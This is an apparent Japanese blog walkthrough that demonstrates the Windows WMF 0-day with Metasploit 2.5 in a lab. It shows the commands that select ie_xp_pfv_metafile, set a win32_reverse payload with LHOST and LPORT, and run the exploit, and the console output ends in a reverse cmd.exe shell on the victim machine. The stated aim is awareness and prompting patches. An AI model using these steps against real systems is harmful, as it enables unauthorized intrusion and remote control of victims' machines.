Windows WMF 0-day Exploit を実演

Windows WMF 0-day Exploit の脆弱性を実演してみよう。
metasploit を使って、WEB アクセスしに来た Windows に侵入するというもの。
ぜひ会社などでも実演して、この脆弱性の恐怖を知ってもらい、即時に対策を促すようにしよう。
対策方法は「Infocon がイエローに! Windows WMF 0-day の危険性が高まる!!」を参考のこと。

ポイント:
 Windows は Shift-JIS なので、ターミナルの変換モードを「Shift-JIS」に設定しておく。
 こうすることで、侵入時に日本語のディレクトリ、ファイル名を扱うことができる。
 Exploit で使う HTTPPORT (8080)、および Payload で使う LPORT (4321) を FW で開けておく。
IP アドレス:
 Windows 端末(攻撃される側)– 192.168.0.1
 Linux 端末(攻撃する側)– 192.168.0.10

絶対に悪用するなよ!


$ wget http://www.metasploit.com/tools/framework-2.5-snapshot.tar.gz <<-- metasploit のダウンロード。
$ tar zxf framework-2.5-snapshot.tar.gz <<-- アーカイブの解凍。
$ cd framework-2.5/ <<-- ディレクトリ変更。
$ ./msfconsole <<-- metasploit の実行。
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)


_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


+ -- --=[ msfconsole v2.5 [113 exploits - 74 payloads]

msf > show exploits <<-- 利用できる exploit の一覧を表示。

Metasploit Framework Loaded Exploits
====================================

3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution
backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow
backupexec_dump Veritas Backup Exec Windows Remote File Access
backupexec_ns Veritas Backup Exec Name Service Overflow
backupexec_registry Veritas Backup Exec Server Registry Access
badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow
bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
barracuda_img_exec Barracuda IMG.PL Remote Command Execution
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
cabrightstor_disco CA BrightStor Discovery Service Overflow
cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow
cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow
cabrightstor_uniagent CA BrightStor Universal Agent Overflow
cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32)
cacti_graphimage_exec Cacti graph_image.php Remote Command Execution
calicclnt_getconfig CA License Client GETCONFIG Overflow
calicserv_getconfig CA License Server GETCONFIG Overflow
distcc_exec DistCC Daemon Command Execution
edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
freeftpd_user freeFTPd USER Overflow
futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow
globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow
gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability
google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution
hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing
hpux_lpd_exec HP-UX LPD Command Execution
ia_webmail IA WebMail 3.x Buffer Overflow
icecast_header Icecast (<= 2.0.1) Header Overwrite (win32)
ie_objecttype Internet Explorer Object Type Overflow
ie_xp_pfv_metafile Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
iis40_htr IIS 4.0 .HTR Buffer Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
iis_fp30reg_chunked IIS FrontPage fp30reg.dll Chunked Overflow
iis_nsiislog_post IIS nsiislog.dll ISAPI POST Overflow
iis_source_dumper IIS Web Application Source Code Disclosure
iis_w3who_overflow IIS w3who.dll ISAPI Overflow
imail_imap_delete IMail IMAP4D Delete Overflow
imail_ldap IMail LDAP Service Buffer Overflow
irix_lpsched_exec IRIX lpsched Command Execution
lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow
lyris_attachment_mssql Lyris ListManager Attachment SQL Injection (MSSQL)
mailenable_auth_header MailEnable Authorization Header Buffer Overflow
mailenable_imap MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow
mailenable_imap_w3c MailEnable IMAPD W3C Logging Buffer Overflow
maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow
mdaemon_imap_cram_md5 Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
mercantec_softcart Mercantec SoftCart CGI Overflow
mercury_imap Mercury/32 v4.01a IMAP RENAME Buffer Overflow
minishare_get_overflow Minishare 1.4.1 Buffer Overflow
mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
ms05_039_pnp Microsoft PnP MS05-039 Overflow
msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow
mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow
netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow
openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution
openview_omniback HP OpenView Omniback II Command Execution
oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)
oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32)
payload_handler Metasploit Framework Payload Handler
php_vbulletin_template vBulletin misc.php Template Name Arbitrary Code Execution
php_wordpress_lastpost WordPress cache_lastpostdate Arbitrary Code Execution
php_xmlrpc_eval PHP XML-RPC Arbitrary Code Execution
phpbb_highlight phpBB viewtopic.php Arbitrary Code Execution
poptop_negative_read Poptop Negative Read Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
rsa_iiswebagent_redirect IIS RSA WebAgent Redirect Overflow
samba_nttrans Samba Fragment Reassembly Overflow
samba_trans2open Samba trans2open Overflow
samba_trans2open_osx Samba trans2open Overflow (Mac OS X)
samba_trans2open_solsparc Samba trans2open Overflow (Solaris SPARC)
sambar6_search_results Sambar 6 Search Results Buffer Overflow
seattlelab_mail_55 Seattle Lab Mail 5.5 POP3 Buffer Overflow
sentinel_lm7_overflow SentinelLM UDP Buffer Overflow
servu_mdtm_overflow Serv-U FTPD MDTM Overflow
shoutcast_format_win32 SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
slimftpd_list_concat SlimFTPd LIST Concatenation Overflow
smb_sniffer SMB Password Capture Service
solaris_dtspcd_noir Solaris dtspcd Heap Overflow
solaris_kcms_readfile Solaris KCMS Arbitary File Read
solaris_lpd_exec Solaris LPD Command Execution
solaris_lpd_unlink Solaris LPD Arbitrary File Delete
solaris_sadmind_exec Solaris sadmind Command Execution
solaris_snmpxdmid Solaris snmpXdmid AddComponent Overflow
solaris_ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow
squid_ntlm_authenticate Squid NTLM Authenticate Overflow
svnserve_date Subversion Date Svnserve
trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow
uow_imap4_copy University of Washington IMAP4 COPY Overflow
uow_imap4_lsub University of Washington IMAP4 LSUB Overflow
ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux)
ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32)
warftpd_165_pass War-FTPD 1.65 PASS Overflow
warftpd_165_user War-FTPD 1.65 USER Overflow
webstar_ftp_user WebSTAR FTP Server USER Overflow
windows_ssl_pct Microsoft SSL PCT MS04-011 Overflow
wins_ms04_045 Microsoft WINS MS04-045 Code Execution
wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
zenworks_desktop_agent ZENworks 6.5 Desktop/Server Management Remote Stack Overflow

msf > use ie_xp_pfv_metafile <<-- exploit の選択。
msf ie_xp_pfv_metafile > show payloads <<-- 利用できる payload の一覧を表示。

Metasploit Framework Usable Payloads
====================================

win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse <<-- payload の設定。
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > show options <<-- オプションの表示。設定が必要なところを確認する。

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- -------- ------- ----------------------------
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Automatic - Windows XP / Windows 2003 / Windows Vista

msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.10 <<-- LHOST が required なのに抜けているので設定する。
LHOST -> 192.168.0.10
msf ie_xp_pfv_metafile(win32_reverse) > show options <<-- LHOST が設定されているか確認する。

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- -------- ------- ----------------------------
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

Payload: Name Default Description
-------- -------- ------------ ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LHOST 192.168.0.10 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Automatic - Windows XP / Windows 2003 / Windows Vista

msf ie_xp_pfv_metafile(win32_reverse) > exploit <<-- exploit を実行。
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.10:8080/
<<-- 待ち状態。脆弱性の有る端末から http://192.168.0.10:8080/ にアクセスしてみる。
[*] HTTP Client connected from 192.168.0.1:2597, redirecting...
[*] HTTP Client connected from 192.168.0.1:2598, sending 1520 bytes of payload...
[*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
[*] Got connection from 192.168.0.10:4321 <-> 192.168.0.1:2599

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user1\デスクトップ> <<-- cmd.exe が実行され、侵入完了。
C:\Documents and Settings\user1\デスクトップ> <<-- 好き放題な状態 (((( ;゚Д゚)))ガクガクブルブル
C:\Documents and Settings\user1\デスクトップ>exit <<-- Windows から抜ける。
exit
[*] Exiting Reverse Handler.
msf ie_xp_pfv_metafile(win32_reverse) > exit <<-- metasploit の終了。

タイトルとURLをコピーしました